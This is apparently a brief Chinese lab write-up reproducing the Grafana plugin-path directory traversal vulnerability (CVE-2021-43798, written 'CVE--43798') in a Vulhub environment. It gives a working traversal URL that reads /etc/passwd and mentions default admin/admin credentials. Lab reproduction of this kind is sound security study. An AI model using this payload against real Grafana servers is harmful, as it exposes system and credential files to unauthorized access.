grafana 目录遍历（CVE--43798）漏洞复现

漏洞描述:

Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0（补丁版本除外）容易受到目录遍历，允许访问本地文件。易受攻击的 URL 路径是：<grafana_host_url>/public/plugins//，其中是任何已安装插件的插件 ID。Grafana Cloud 在任何时候都不会受到攻击。建议用户升级到补丁版本 8.0.7、8.1.8、8.2.7 或 8.3.1。GitHub 安全公告包含有关易受攻击的 URL 路径、缓解措施和披露时间表的更多信息。

启动Vulhub靶场镜像

cd /vulhub/grafana/CVE--43798docker-compose up -d

访问靶机环境

admin/admin弱密码登录

获取一个登录后的GET包并修改url

/public/plugins/welcome/…/…/…/…/…/…/…/…/…/etc/passwd

最终的flag藏在grafana的历史命令里